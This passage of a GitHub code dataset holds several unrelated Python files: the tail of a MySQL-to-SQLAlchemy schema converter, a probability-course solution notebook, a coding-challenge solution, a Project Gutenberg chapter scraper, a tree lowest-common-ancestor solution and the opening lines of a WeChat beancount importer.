{0}'.format(s))\n #print(s)\n code.append('\\n')\n #print('')\n schema.extend(code)\n\n imports = []\n for module, types in sorted(typedefs.items()):\n imports.append('from %s import %s' % (module, ', '.join(sorted(types))))\n schema = imports + [''] + schema\n\n colortext.warning('*** SQLAlchemy class definitions ***')\n print(('\\n'.join(schema)))\n\n\n def _create_intermediate_schema(self, tbl):\n code = (self.db_interface.execute(\"SHOW CREATE TABLE %s\" % tbl))\n assert(len(code) == 1)\n schema = code[0]['Create Table']\n #colortext.message(tbl)\n\n #print(schema)\n\n #print(schema)\n fields = [f for f in map(string.strip, schema[schema.find('(') + 1:schema.find('PRIMARY KEY')].strip().split('\\n')) if f.strip()]\n\n pk_fields = re.match('.*PRIMARY\\s+KEY\\s*[(](.*?)[)]\\s*[,)].*', schema, re.DOTALL)\n assert(pk_fields)\n pk_fields = [s.strip() for s in pk_fields.group(1).replace('`', '').split(',') if s.strip()]\n\n\n #colortext.warning(fields)\n for f in fields:\n #print('')\n #colortext.message(f)\n if f.endswith(','):\n f = f[:-1]\n\n field_name = f.split()[0].replace('`', '')\n if f.split()[1].startswith('enum('):\n mtchs = re.match(\".* (enum[(].*?[)])(.*)\", f)\n assert(mtchs)\n #print('ENUM', mtchs.group(1))\n field_type = mtchs.group(1)\n remaining_description = mtchs.group(2)\n else:\n field_type = f.split()[1]\n remaining_description = (' '.join(f.split()[2:])).strip()\n\n unicode_collation_or_character_set = False\n if remaining_description.find('utf') != -1:\n unicode_collation_or_character_set = True\n\n not_null = False\n if remaining_description.find('NOT NULL') != -1:\n not_null = True\n remaining_description = remaining_description.replace('NOT NULL', '').strip()\n\n default = False\n default_type = None\n default_value = None\n if remaining_description.find('default CURRENT_TIMESTAMP') != -1:\n default_type = 'TIMESTAMP'\n default_value = None\n remaining_description = remaining_description.replace('default CURRENT_TIMESTAMP', '')\n elif remaining_description.find('default NULL') != -1:\n default_type = 'null'\n default_value = None\n remaining_description = remaining_description.replace('default NULL', '')\n elif remaining_description.find('default') != -1:\n mtchs = re.match(\".*default '(.*?)'.*\", remaining_description)\n if mtchs:\n #print('mtchs', mtchs.group(1))\n default_type = 'string'\n default_value = mtchs.group(1)\n remaining_description = remaining_description.replace(\"default '%s'\" % default_value, \"\")\n else:\n colortext.error('Unexpected default value string: \"{0}\".'.format(remaining_description))\n pass\n #mtchs = re.match(\".*default (.*?)(\\s.*)*$\", remaining_description)\n #if mtchs:\n # print('mtchs non-string', mtchs.group(1))\n # if mtchs.group(1) == 'NULL':\n # default_type = 'null'\n # default_value = None\n # remaining_description = remaining_description.replace('')\n\n comment = None\n mtchs = re.match(\".*(COMMENT '.*?').*\", remaining_description)\n if mtchs:\n comment = mtchs.group(1)\n remaining_description = remaining_description.replace(mtchs.group(1), \"\")\n\n remaining_description = remaining_description.strip()\n\n self.intermediate_schema[tbl] = self.intermediate_schema.get(tbl, [])\n self.intermediate_schema[tbl].append(IntermediateField(field_name, field_type, not_null = not_null, default_type = default_type, default_value = default_value, comment = comment, is_primary_key = field_name in pk_fields, unicode_collation_or_character_set = unicode_collation_or_character_set))\n\n #print('field_name : %s' % field_name)\n 
#print('field_type : %s' % field_type)\n            #print('not_null : %s' % not_null)\n\n            if default_type is not None:\n                pass\n                #print('default: %s, %s' % (default_type, default_value))\n            #print('comment : %s' % comment)\n            if remaining_description:\n                #colortext.error('remaining_description : %s' % remaining_description)\n                pass\n            #print('\\n')\n\n\nif __name__ == '__main__':\n    script_name = sys.argv[0]\n    args = sys.argv[1:]\n    if 4 > len(args) or len(args) > 6:\n        print(('Usage : %s [user] [host] [db] [passwd]' % script_name))\n        print(('Optional arguments: %s [user] [host] [db] [passwd] [port] [socket]' % script_name))\n    else:\n        user = args[0]\n        host = args[1]\n        db = args[2]\n        passwd = args[3]\n        port = 3306\n        socket = '/var/lib/mysql/mysql.sock'\n        if len(args) == 6:\n            socket = args[5]\n        if len(args) >= 5:\n            try:\n                port = int(args[4])\n            except:\n                colortext.error('Error: Port must be a numeric string.')\n                sys.exit(1)\n        sc = MySQLSchemaConverter(user, host, db, passwd, port, socket)\n        sc.get_sqlalchemy_schema()\n","repo_name":"Kortemme-Lab/klab","sub_path":"klab/db/sqlalchemy_interface.py","file_name":"sqlalchemy_interface.py","file_ext":"py","file_size_in_byte":18870,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
{"seq_id":"14145582014","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Series 2: Solutions \n# ## Exercise 1: \n# \n# We have at our disposal the pass/fail data for the 2020 exam of this course. We will focus in particular on two binary variables in these data:\n# - The section: **S** $\\in\\{\\text{GM},\\text{EL}\\}$\n# - Success on the exam: **A** $\\in\\{0,1\\}$\n# \n# When working with conditional probabilities of two binary variables, a common mistake is to believe that:\n# \\begin{equation*} \\mathbb{P}\\left(\\textbf{A} = 1 | \\textbf{S} = \\text{GM}\\right) + \\mathbb{P}\\left(\\textbf{A} = 1 | \\textbf{S} = \\text{EL}\\right) = 1 \\end{equation*}\n# However, this is generally false. We will therefore show that it is false in our case, and see what the correct version of this equation would be.\n\n# In[ ]:\n\n\nimport pandas as pd\ndata = pd.read_csv(\"Success_ProbaStat.csv\")\n\n\n# 1\\) Summarize these data so as to obtain the number of failures and passes per section.\n\n# In[ ]:\n\n\n########### Python solution: ##########\n\nn = len(data)\nProp = data.value_counts(subset = [\"Section\",\"Succes\"])/n\nProp\n\n\n# 2\\) Show experimentally that $ \\mathbb{P}\\left(\\textbf{A} = 1 | \\textbf{S} = \\text{GM}\\right) + \\mathbb{P}\\left(\\textbf{A} = 1 | \\textbf{S} = \\text{EL}\\right) \\neq 1 $:\n\n# In[ ]:\n\n\n########### Python solution: ##########\n\n\n# Empirical probability of being in GM or in EL\nprop_section = data.value_counts(subset = [\"Section\"])/n\n# Compute this sum of probabilities\nprob_sum = Prop[0]/prop_section[0] + Prop[1]/prop_section[1]\nprob_sum\n\n\n# 3\\) This mistake is rather common and comes from a confusion with another equation, which is correct:\n# \\begin{equation*}\\mathbb{P}\\left(\\textbf{A} = 1 | \\textbf{S} = \\text{s}\\right) + \\mathbb{P}\\left(\\textbf{A} = 0 | \\textbf{S} = \\text{s}\\right) = 1, \\forall s\\in\\{\\text{GM},\\text{EL}\\}\n# \\end{equation*}\n# Verify experimentally that this equation is correct. \n# **Solution**: \n# This result is true in general; it follows directly from the definition of conditional probability. Could you show rigorously why it is true?
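\n# Indeed, for any section $s$ with $\\mathbb{P}(S=s)>0$, the definition of conditional probability gives\n# \\begin{equation*}\\mathbb{P}(A=1|S=s) + \\mathbb{P}(A=0|S=s) = \\frac{\\mathbb{P}(A=1,S=s) + \\mathbb{P}(A=0,S=s)}{\\mathbb{P}(S=s)} = \\frac{\\mathbb{P}(S=s)}{\\mathbb{P}(S=s)} = 1,\\end{equation*}\n# since the events $\\{A=1\\}$ and $\\{A=0\\}$ partition the sample space.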
\n# \n\n# In[ ]:\n\n\n########### Python solution: ##########\n\n\nEL = Prop[1]/prop_section[1] + Prop[3]/prop_section[1]\nGM = Prop[0]/prop_section[0] + Prop[2]/prop_section[0]\n\nprint(f\"EL = {EL}, GM = {GM}\")\n\n\n# ## Exercise 2: \n# \n# We consider four functions defined from the set $\\left\\{0, 1, 2, ..., 10\\right\\}$ into $\\mathbb{R}$. The goal of this exercise is to check which of these functions are mass functions.\n\n# In[ ]:\n\n\nimport fonction\n\nX = [0,1,2,3,4,5,6,7,8,9,10]\n\n# You can access these four functions, f1,f2,f3,f4, as follows\nfonction.f2(2)\n\n\n# 1\\) Is the function ```f1``` a mass function?\n# \n# **Solution**: Yes, the function ```f1``` is a mass function.\n# \n\n# In[ ]:\n\n\n########### Python solution: ##########\n\n# Check whether f1 is a mass function\nmasse = True\nsum_ = 0\nfor x in X:\n    sum_ += fonction.f1(x)\n    if fonction.f1(x)<0:\n        masse = False\n        print(f\"f1({x}) = {fonction.f1(x)} < 0\")\n\nif abs(sum_-1)>1e-06:\n    masse = False\n\nif masse:\n    print(\"The function f1 is therefore a mass function\")\nelse: \n    print(\"The function f1 is therefore not a mass function\")\n\n\n# 2\\) Is the function ```f2``` a mass function?\n# \n# **Solution**: No, the function ```f2``` is not a mass function because it does not satisfy the condition $\\sum_i f_2(x_i) = 1$\n# \n\n# In[ ]:\n\n\n########### Python solution: ##########\n\n# Check whether f2 is a mass function\nmasse = True\nsum_ = 0\nfor x in X:\n    sum_ += fonction.f2(x)\n    if fonction.f2(x)<0:\n        masse = False\n        print(f\"f2({x}) = {fonction.f2(x)} < 0\")\n\nif abs(sum_-1)>1e-06:\n    masse = False\n\nif masse:\n    print(\"The function f2 is therefore a mass function\")\nelse: \n    print(\"The function f2 is therefore not a mass function\")\n\n\n# 3\\) Is the function ```f3``` a mass function?\n# \n# **Solution**: Yes, the function ```f3``` is a mass function.\n# \n\n# In[ ]:\n\n\n########### Python solution: ##########\n\n# Check whether f3 is a mass function\nmasse = True\nsum_ = 0\nfor x in X:\n    sum_ += fonction.f3(x)\n    if fonction.f3(x)<0:\n        masse = False\n        print(f\"f3({x}) = {fonction.f3(x)} < 0\")\n\nif abs(sum_-1)>1e-06:\n    masse = False\n\nif masse:\n    print(\"The function f3 is therefore a mass function\")\nelse: \n    print(\"The function f3 is therefore not a mass function\")\n\n\n# 4\\) Is the function ```f4``` a mass function?\n# \n# **Solution**: No, the function ```f4``` is not a mass function because it does not satisfy the condition $\\sum_i f_4(x_i) = 1$, and we have $f4(9) < 0$, which is impossible, by definition, for a mass function.\n# \n\n# In[ ]:\n\n\n########### Python solution: ##########\n\n# Check whether f4 is a mass function\nmasse = True\nsum_ = 0\nfor x in X:\n    sum_ += fonction.f4(x)\n    if fonction.f4(x)<0:\n        masse = False\n        print(f\"f4({x}) = {fonction.f4(x)} < 0\")\n\nif abs(sum_-1)>1e-06:\n    masse = False\n\nif masse:\n    print(\"The function f4 is therefore a mass function\")\nelse: \n    print(\"The function f4 is therefore not a mass function\")\n\n
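\n# The four checks above repeat the same pattern; a compact helper (a sketch, not part of the original notebook) makes the two mass-function conditions explicit:\n\n# In[ ]:\n\n\ndef is_pmf(f, support, tol=1e-06):\n    # a mass function must be non-negative and sum to one over its support\n    values = [f(x) for x in support]\n    return all(v >= 0 for v in values) and abs(sum(values) - 1) <= tol\n\n# e.g. [is_pmf(g, X) for g in (fonction.f1, fonction.f2, fonction.f3, fonction.f4)]\n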
\n# ## Exercise 3: \n# \n# The goal of this exercise is to determine whether the following functions can be cumulative distribution functions.\n\n# In[ ]:\n\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfig, (ax1, ax2, ax3) = plt.subplots(1, 3,figsize = (10,4))\nax1.plot(np.array([-10.,0.,0.,10.,10.,20.,20.,30.,30.,40.,40.,50.,50.,60.,60.,70.,70.,80.,80.,90.,90.,100.,100.,120.,120.]),\n         np.array([0.,0.,0.1,0.1,0.19,0.19,0.25,0.25,0.34,0.34,0.45,0.45,0.5,0.5,0.57,0.57,0.61,0.61,0.63,0.63,0.65,0.65,0.67,0.67,0.67]))\nax1.set_title(\"Figure 1\")\n\nax2.plot(np.array([-10.,0.,0.,10.,10.,20.,20.,30.,30.,35.,35.,50.,50.,54.,54.,70.,70.,83.,83.,90.,90.,115.,115.,120.,120.]),\n         np.array([0.,0.,0.05,0.05,0.09,0.09,0.15,0.15,0.34,0.34,0.39,0.39,0.47,0.47,0.67,0.67,0.86,0.86,0.89,0.89,0.91,0.91,1.,1.,1.]))\nax2.set_title(\"Figure 2\")\n\nax3.plot(np.array([-10.,0.,0.,10.,10.,20.,20.,30.,30.,35.,35.,50.,50.,54.,54.,70.,70.,83.,83.,90.,90.,115.,115.,120.,120.]),\n         np.array([0.,0.,0.05,0.05,0.09,0.09,0.15,0.15,0.34,0.34,0.39,0.39,0.47,0.47,0.67,0.67,0.86,0.86,0.84,0.84,0.91,0.91,1.,1.,1.]))\nax3.set_title(\"Figure 3\")\n\nplt.show()\n\n\n# 1\\) Is Figure 1 the plot of a cumulative distribution function?\n# \n# **Solution**: No, because $ F(x) = \\Pr (X \\leq x) $ implies that $ \\lim_{x\\to\\infty} F(x) = 1 $. \n# \n# 2\\) Is Figure 2 the plot of a cumulative distribution function?\n# \n# **Solution**: Yes. \n# \n# 3\\) Is Figure 3 the plot of a cumulative distribution function?\n# \n# **Solution**: No, because the function must be non-decreasing.\n# \n\n# ## Exercise 4: Link between a Bernoulli variable and a geometric variable\n# \n# Consider an archer who aims at the middle of the target. He shoots as many arrows as necessary and stops once one of them hits the center of the target. We assume that he reaches his goal with probability $p$ on each arrow and that the shots are independent of one another.\n# - Whether the $i$-th shot hits the center of the target can then be modelled by the random variable $X_i \\sim Bern(p)$. \n# - Likewise, the number of arrows needed to hit the center of the target can be modelled by the random variable $ S = \\min\\left\\{{i\\in\\mathbb{N} | X_i = 1}\\right\\}$, which follows a geometric law with parameter $p$.\n\n# 1\\) In this question we will create a function ```bern``` that randomly generates a Bernoulli variable for a parameter $p$ given as argument. \n# a\\) Write such a function using ```random.uniform``` from the ```numpy``` package, which generates realizations of uniform random variables, and the indicator function $\\mathbf{1}_{\\{U<p\\}}$. \n# \n# **Solution**: \n# Other indicators with the same law would work just as well, for example\n# \\begin{equation*} \\mathbf{1}_{\\{U<\\frac{p}{3}\\}\\cup\\{U>1-\\frac{2p}{3}\\}}\\end{equation*} \n# \n# One could imagine infinitely many more; the important point is that the measure (the size) of the set on which the indicator function equals $1$ must be $p$.\n# \n
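\n# In[ ]:\n\n\n# A minimal sketch of a `bern` implementation; it assumes the signature\n# bern(p, n) that `geom` below relies on.\nimport numpy as np\n\ndef bern(p, n):\n    # the indicator of {U < p} for U ~ Uniform(0,1) is a Bernoulli(p) draw\n    U = np.random.uniform(0, 1, n)\n    return (U < p).astype(int)\n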
\n# 2\\) Using the function ```bern```, write a function ```geom``` that simulates the generation of a random variable $S = \\min\\left\\{{i\\in\\mathbb{N} | X_i = 1}\\right\\}$, where $X_i \\sim Bern(p)$.\n\n# In[ ]:\n\n\ndef geom(p):\n    \n    if abs(p)<1e-10:\n        raise ValueError(\"The success probability must be greater than zero.\")\n    \n    S = 1\n    X = bern(p,1)\n    \n    while X != 1:\n        S +=1\n        X = bern(p,1)\n    \n    return S\n\n\n# 3\\) We will now estimate a few probabilities related to our random variable $S$: \n# a\\) Using a plot and a numerical value, estimate the value of $\\mathbb{P}(S = 1)$ ($n = 10000$ should be enough for a good estimate). \n# \n# **Solution**: \n# Observe that our estimate seems to converge towards $p = 0.3$, which is precisely the true value of $\\mathbb{P}(S = 1)$ (for $p = 0.3$).\n# \n\n# In[ ]:\n\n\nn = 10000\np = 0.3\n\n# Generate n observations of S\nS = [geom(p) for i in range(n)]\n\n# Propose an estimate of P(S = 1)\nprob1 = (S == np.ones(n)).sum()/n\nprint(f\"We therefore estimate this probability by: {prob1}\")\n\n# Plot the convergence of this estimate\nfig = plt.figure(figsize = (6,4))\nplt.plot(np.arange(1,n+1),(S == np.ones(n)).cumsum()/np.arange(1,n+1))\nfig.suptitle(\"Convergence of the estimate of P(S=1)\")\nfig.supylabel(\"Probability estimate\")\nfig.supxlabel(\"Number of generated variables\")\nplt.show()\n\n\n# b\\) In the same way as in the previous question, estimate the probability $\\mathbb{P}(S>3)$.\n# \n# **Solution**: \n# Observe that our estimate seems to converge towards a value close to $0.34$, which is indeed close to the true value $\\mathbb{P}(S > 3) = (1-p)^3 = 0.343$ (for $p = 0.3$). \n# \n\n# In[ ]:\n\n\nn = 10000\np = 0.3\n\n# Generate n observations of S\nS = [geom(p) for i in range(n)]\n\n# Propose an estimate of P(S > 3)\nprob2 = (S > 3.*np.ones(n)).sum()/n\nprint(f\"We therefore estimate this probability by: {prob2}\")\n\n# Plot the convergence of this estimate\nfig = plt.figure(figsize = (6,4))\nplt.plot(np.arange(1,n+1),(S > 3.*np.ones(n)).cumsum()/np.arange(1,n+1))\nfig.suptitle(\"Convergence of the estimate of P(S>3)\")\nfig.supylabel(\"Probability estimate\")\nfig.supxlabel(\"Number of generated variables\")\nplt.show()\n\n\n# c\\) Finally, for fixed values $m$ and $t$, verify that $\\mathbb{P}(S > t + m| S > t) = \\mathbb{P}(S > m)$.\n# \n# **Solution**: \n# We observe that these two values converge towards each other, and that each converges to the value $\\mathbb{P}(S > t + m| S > t) = \\mathbb{P}(S > m) = (1-p)^m = 0.49$ (for $p = 0.3$).\n# \n\n# In[ ]:\n\n\nn = 10000 \np = 0.3\n\nt = 4\nm = 2\n\n# Generate two sets of n observations of S, so that each of these\n# two probabilities is estimated from its own distinct sample\nS1 = [geom(p) for i in range(n)]\nS2 = [geom(p) for i in range(n)]\n\n# Propose an estimate of P(S > t + m | S > t)\nprob3_1 = (S1 > (t+m)*np.ones(n)).sum()/n\nprob3_2 = (S1 > t*np.ones(n)).sum()/n\nprob3 = prob3_1/prob3_2\nprint(f\"We therefore estimate the probability P(S > t + m | S > t) by: {prob3}\")\n\n# Propose an estimate of P(S > m)\nprob3_ = (S2 > m*np.ones(n)).sum()/n\nprint(f\"We therefore estimate the probability P(S > m) by: {prob3_}\")\n\n# Plot the convergence of the absolute difference between these two estimates\nfig = plt.figure(figsize = (6,4))\np_sup_t = (S1 > t*np.ones(n)).cumsum()\nind = np.argwhere(p_sup_t)\nplt.plot(np.arange(1,n+1)[ind],abs((S1 > (t+m)*np.ones(n)).cumsum()[ind]/p_sup_t[ind] -(S2 > m*np.ones(n)).cumsum()[ind]/np.arange(1,n+1)[ind]))\nfig.suptitle(\"Convergence of the absolute difference between the two estimates\")\nfig.supylabel(\"Probability estimate\")\nfig.supxlabel(\"Number of generated variables\")\nplt.show()\n
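\n# Why this identity holds: for a geometric law $\\mathbb{P}(S>t)=(1-p)^t$, so\n# \\begin{equation*}\\mathbb{P}(S>t+m|S>t)=\\frac{\\mathbb{P}(S>t+m)}{\\mathbb{P}(S>t)}=\\frac{(1-p)^{t+m}}{(1-p)^t}=(1-p)^m=\\mathbb{P}(S>m),\\end{equation*}\n# which is the memorylessness property of the geometric distribution.\n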
\n\n# ## Exercise 5: \n# \n# 1\\) Which of the following functions is the density of a continuous variable? Do you recognize this law?\n# \n# **Solution**: \n# Only the last two are density functions of a continuous variable, because the other two do not satisfy $\\int_{\\mathbb{R}} f(x) dx = 1$. Figure 3 represents the density function of a uniform law $\\mathcal{U}(0,1)$.\n# \n\n# In[ ]:\n\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfig, axs = plt.subplots(2, 2,figsize = (8,6))\naxs[0,0].plot(np.array([-1.,0.,0.,1.,1.,2.]),\n              np.array([0.,0.,2.,2.,0.,0.]))\naxs[0,0].set_title(\"Figure 1\")\n\naxs[0,1].plot(np.array([-1.,0.25,0.25,0.75,0.75,2.]),\n              np.array([0.,0.,1.,1.,0.,0.]))\naxs[0,1].set_title(\"Figure 2\")\n\naxs[1,0].plot(np.array([-1.,0.,0.,1.,1.,2.]),\n              np.array([0.,0.,1.,1.,0.,0.]))\naxs[1,0].set_title(\"Figure 3\")\n\naxs[1,1].plot(np.array([-1.,-0.5,0.,0.5,1.,1.5,2.,2.5]),\n              np.array([0.,0.,1.,0.,0.,1.,0.,0.]))\naxs[1,1].set_title(\"Figure 4\")\n\nplt.show()\n\n\n# ## Exercise 6: \n# \n# 1\\) Are the following functions cumulative distribution functions? If so, are they CDFs of continuous or of discrete variables?\n# \n# **Solution**: \n# - The first and the last graph represent cumulative distribution functions of discrete laws.\n# - The second and the third represent cumulative distribution functions of continuous laws.\n# - The fourth graph represents the CDF of a law that is neither discrete nor continuous (it is in fact a mixed law).\n# - The function shown on the fifth graph is not a cumulative distribution function, because it is not non-decreasing. \n# \n\n# In[ ]:\n\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfig, axs = plt.subplots(2, 3,figsize = (8.5,6.5))\naxs[0,0].plot(np.array([-10.,0.,0.,10.,10.,20.,20.,30.,30.,40.,40.,50.,50.,60.,60.,70.,70.,80.,80.,90.,90.,100.,100.,120.,120.]),\n              np.array([0.,0.,0.1,0.1,0.19,0.19,0.25,0.25,0.34,0.34,0.45,0.45,0.5,0.5,0.57,0.57,0.61,0.61,0.63,0.63,0.65,0.65,0.67,0.67,0.67])/0.67)\naxs[0,0].set_title(\"Figure 1\")\n\naxs[0,1].plot(np.linspace(-2,4,100),np.exp(np.linspace(-2,4,100))/(1+np.exp(np.linspace(-2,4,100))))\naxs[0,1].set_title(\"Figure 2\")\n\naxs[0,2].plot(np.array([-1.,0.,1.,2.]),\n              np.array([0.,0.,1.,1.]))\naxs[0,2].set_title(\"Figure 3\")\n\naxs[1,0].plot(np.array([-1.,0,1,2,2,3,4]),\n              np.array([0.,0.,0.4,0.4,0.6,1.,1]))\naxs[1,0].set_title(\"Figure 4\")\n\naxs[1,1].plot(np.array([-1.,0,1,2,2,3,4]),\n              np.array([0.,0.,0.4,0.,0.6,1.,1]))\naxs[1,1].set_title(\"Figure 5\")\n\naxs[1,2].plot(np.array([-1.,0,0,1,1,2]),\n              np.array([0.,0.,0.4,0.4,1.,1]))\naxs[1,2].set_title(\"Figure 6\")\n\nplt.show()\n\n","repo_name":"MatthWilhelm/ProbaStat","sub_path":"book/_build/jupyter_execute/Correction/Python/Série2/Sol2P.py","file_name":"Sol2P.py","file_ext":"py","file_size_in_byte":17179,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"22499605761","text":"# Geekina gave Geek a challenge, she asked Geek to choose any positive number (say x) and perform the operation at least twice - \n# Add x to your current score and double the value of x. \n# The challenge here is that you must perform the above operation at least twice, and after performing it your score should be exactly k. \n# Could you help Geek by giving him the largest x to start with, or return -1 if no such x exists? \n# Note: Initially the score is 0\n\n\n# # easy solution\n# def acceptTheChallenge(k):\n#     n = k//3\n#     for i in range(n, 0, -1):\n#         score = 0\n#         x = i\n#         while(score < k):\n#             score += x\n#             x *= 2\n#         if(score == k):\n#             return i\n#     return -1\n    \n## advanced solution\n# score = x + 2 * (x + 2 * (x + ... + 2 * (x + 2 * 0)))\n#       = x + 2 * (x + 2 * (x + ... + 2 * x))\n#       = x + 2 * (x * (2^n - 1))\n#       = x * (2^(n+1) - 1)\n
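#\n# Worked check: for k = 21, n = 2 gives divisor 2**2 - 1 = 3, so x = 21 // 3 = 7, and indeed 7 + 14 = 21 after exactly two operations; for k = 8, neither 3 nor 7 divides 8 and the next divisor 15 > 8, hence -1.\n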
\n\ndef acceptTheChallenge(k):\n    n = 2\n    while True:\n        divisor = 2**n - 1\n        if divisor > k:\n            return -1\n        elif k % divisor == 0:\n            x = k // divisor\n            if x <= k // 3:\n                return x\n        n += 1\n    \nprint(acceptTheChallenge(8))\n# Output:\n# -1\n\n# Explanation:\n# It can be shown that there does not exist any x that can help Geek to have a score of exactly 8.\nprint(acceptTheChallenge(7))\n# Output:\n# 1\n\n# Explanation:\n# Geek will choose x = 1 and do the following operations - \n# Add 1 to score and double x. Therefore x = 2 and Score = 1\n# Now add 2 to score and double x. Therefore x = 4 and Score = 3\n# Now add 4 to the score and double x. Therefore x = 8 and Score = 7.\nprint(acceptTheChallenge(28))\nprint(acceptTheChallenge(33))","repo_name":"Sendy459/-LeetCode-Solutions-by-Daniel-Senderovych","sub_path":"Math/AcceptTheChallange_GeekForGeeks.py","file_name":"AcceptTheChallange_GeekForGeeks.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"15345782190","text":"import urllib2\nfrom BeautifulSoup import BeautifulSoup\n\ndef remove_script(html):\n\t# removes everything (including the tags themselves) between '<script' and '</script>';\n\t# only the text outside the first script block is included.\n\tsplits = html.split('<script')\n\tfront = splits[0]\n\tback = '</script>'.join(html.split('</script>')[1:])\n\treturn front + back\n\n\nclass Book():\n\tdef __init__(self, book_id):\n\t\tself.base_url = 'http://gutenberg.spiegel.de/'\n\t\tself.book_id = book_id\n\t\tself.filename_tmp = None\n\t\t\n\tdef download(self):\n\t\tself.filename_tmp = 'gutenberg_book_%d.html.tmp' % self.book_id\n\t\tfh = open(self.filename_tmp, 'w')\n\t\tfor chapter in self.chapters():\n\t\t\tfh.write(str(chapter))\n\t\tfh.close()\n\t\t\t\n\tdef chapters(self):\n\t\tchapter = 1\n\t\twhile True:\n\t\t\tcontent = self.get_chapter(chapter)\n\t\t\tif content is None:\n\t\t\t\tbreak\n\t\t\tyield content\n\t\t\tchapter += 1\n\t\t\t\n\tdef get_chapter(self, chapter):\n\t\tsoup = self.get_soup(chapter)\n\t\tcontent = soup.find('div', id='gb_texte')\n\t\treturn content\n\t\t\t\n\tdef get_soup(self, chapter):\n\t\turi = self.generate_uri(chapter)\n\t\tresponse = urllib2.urlopen(uri)\n\t\thtml = remove_script(response.read())\n\t\treturn BeautifulSoup(html)\n\t\t\n\tdef generate_uri(self, chapter):\n\t\tid = 12 # The id-parameter determines which page is called. 12 is \"printable\", 5 is standard text\n\t\treturn self.base_url + '?id=' + str(id) + '&xid=' + str(self.book_id) + '&kapitel=' + str(chapter)\n\t\n\tdef save_as(self, filename):\n\t\tif not self.filename_tmp:\n\t\t\tself.download()\n\t\tin_file = open(self.filename_tmp, 'r')\n\t\tout_file = open(filename, 'w')\n\t\theader = '''<html>\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\">\n<link rel=\"stylesheet\" href=\"%s\" type=\"text/css\">\n</head>\n<body>\n
''' % (self.base_url)\n\t\tfooter = '''</body>\n</html>
\n\n'''\n\t\tout_file.write(header)\n\t\tout_file.write(in_file.read()) \n\t\tout_file.write(footer)\n\t\tout_file.close()\n\t\t\n\t\t\n\tdef __del__(self):\n\t\t#Implement something to delete the self.filename_tmp file.\n\t\tpass\n\nif __name__=='__main__':\n\tbook = Book(book_id = 2418) #2418 is Kabale und Liebe von Schiller\n\tbook.download()\n\tbook.save_as('Kabale_und_Liebe.html')","repo_name":"siedentop/Gutenberg","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15031748719","text":"import sys\r\nsys.setrecursionlimit(int(1e9))\r\n\r\nclass LCA:\r\n LOG_V = 17\r\n root = 0\r\n def __init__(self, number_of_node):\r\n self.V = number_of_node\r\n self.G = [[] for i in range(number_of_node)]\r\n self.parent = [[-1]*number_of_node for i in range(self.LOG_V)]\r\n self.depth = [0] * number_of_node\r\n self.D = [0] * number_of_node\r\n \r\n \r\n def add_edge(self,a, b, c):\r\n self.G[a].append((b, c))\r\n self.G[b].append((a, c))\r\n \r\n def invoke_dfs(self):\r\n parent = self.parent\r\n depth = self.depth\r\n D = self.D\r\n G = self.G\r\n def dfs(v, p, d, c):\r\n parent[0][v] = p\r\n depth[v] = d\r\n D[v] = c\r\n for to, cost in G[v]:\r\n if to != p:\r\n dfs(to, v, d+1, c + cost)\r\n dfs(self.root, -1, 0, 0)\r\n \r\n def getAnc(self, v, n):\r\n parent = self.parent\r\n for k in range(self.LOG_V):\r\n if v != -1 and ((n>>k) & 1):\r\n v = parent[k][v];\r\n return v\r\n\r\n def build(self):\r\n self.invoke_dfs()\r\n parent = self.parent\r\n for k in range(self.LOG_V-1):\r\n for v in range(self.V):\r\n if parent[k][v] < 0:\r\n parent[k+1][v] = -1\r\n else:\r\n parent[k+1][v] = parent[k][parent[k][v]]\r\n \r\n \r\n def lca(self, u, v):\r\n depth = self.depth\r\n if depth[u] > depth[v]:\r\n u, v = v, u\r\n v = self.getAnc(v, depth[v] - depth[u])\r\n if u == v:\r\n return u;\r\n\r\n parent = self.parent\r\n for k in range(self.LOG_V-1, -1, -1):\r\n if parent[k][u] != parent[k][v]:\r\n u = parent[k][u]\r\n v = parent[k][v]\r\n return parent[0][u];\r\n\r\n def getDis (self, u, v):\r\n return self.D[u] + self.D[v] - 2 * self.D[self.lca(u, v)];\r\n \r\n\r\n\r\nN = int(input())\r\nlca = LCA(N)\r\nadd_edge = lca.add_edge\r\nfor i in range(N-1):\r\n x, y = (int(i) for i in sys.stdin.readline().split())\r\n #x, y = (int(i) for i in input().split())\r\n add_edge(x - 1, y - 1, 1)\r\n \r\nlca.build()\r\n\r\nQ = int(input())\r\ngetDis = lca.getDis\r\ndepth = lca.depth\r\nlca = lca.lca\r\nfor i in range(Q):\r\n a, b = (int(i) for i in sys.stdin.readline().split())\r\n a = a - 1\r\n b = b - 1\r\n #a, b = (int(i) for i in input().split())\r\n ans = depth[a] + depth[b] - 2 * depth[lca(a, b)] + 1;\r\n print (ans)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc014/D/2898298.py","file_name":"2898298.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"70383228392","text":"# -*- coding: UTF-8 -*-\n\n\"\"\"Importer for 微信\n\"\"\"\n__copyright__ = \"Copyright (C) 2019 He Yeshuang\"\n__license__ = \"GNU GPLv2\"\n\nimport csv\nimport datetime\nimport logging\nimport re\nimport sys\nfrom enum import Enum\nfrom os import path\nfrom typing import Dict\n\nfrom beancount.core import account, data, position\nfrom beancount.core.amount import Amount\nfrom beancount.core.number import ZERO, D\nfrom beancount.ingest import importer\nfrom dateutil.parser import 
